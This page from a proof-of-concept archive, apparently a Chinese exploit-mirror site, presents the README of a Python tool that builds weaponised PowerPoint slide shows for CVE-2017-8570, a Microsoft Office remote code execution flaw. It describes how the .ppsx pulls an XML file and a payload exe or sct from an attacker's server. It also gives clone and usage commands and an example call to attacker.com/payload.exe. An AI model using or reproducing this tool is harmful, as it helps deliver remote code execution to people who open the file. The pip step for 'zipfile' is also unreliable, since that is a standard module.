Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%

CVE-2017-8570 PoC — Microsoft Office 安全漏洞

Source
Associated Vulnerability
Title:Microsoft Office 安全漏洞 (CVE-2017-8570)
Description:Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243.
Description
ppsx file generator for cve-2017-8570 (based on bhdresh/cve-2017-8570)
Readme
# Introduction
By Temesgen Yibeltal temu1yibeltal@gmail.com (Based on code by https://github.com/bhdresh/CVE-2017-8570 (now removed))

ppsx-file-generator is a python tool that generates a power point slide show file that executes code from a remote source based on an existing file.

# What does it do?

The tool generates a power point slide show file and an xml file based using the input provided. The power point file accesses the xml file which holds information of the payload file. An attacker could serve the xml file and the payload on a local or public server and provide the url for each as input.

# Getting the code

First, get the code:
```
git clone https://github.com/temesgeny/ppsx-file-generator.git
```

ppsx-file-generator is written in Python and requires zipfile which can be installed using Pip:
```
pip install zipfile
```
Requires Microsoft Office Power Point to  carry out this task.

# Usage
First open Microsoft Office Power Point and open 'template.ppsx'. Open your own presentation file and copy the icon 'Coder.exe' from template.ppsx to slide 1 of your power point file. Save the file as Power Point Show (.ppsx). Then use the python tool as

        Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri

        input_filename          The input ppsx file name.

        -o              Output .ppsx file name, (inlcude the .ppsx).
        -p              The payload exe or sct file url. 
                        It must be in an accessible web server. (Optional for xml file)
        -x              The full xml uri to be called by the ppsx file. 
                        It must be in an accessible web server.(Required)

```
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully
```
File Snapshot

[4.0K] /data/pocs/5fc4cd35c9556d55375eb494703fbf5097b73ab5 ├── [8.3K] generate_ppsx.py ├── [1.8K] README.md └── [ 32K] template.ppsx 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →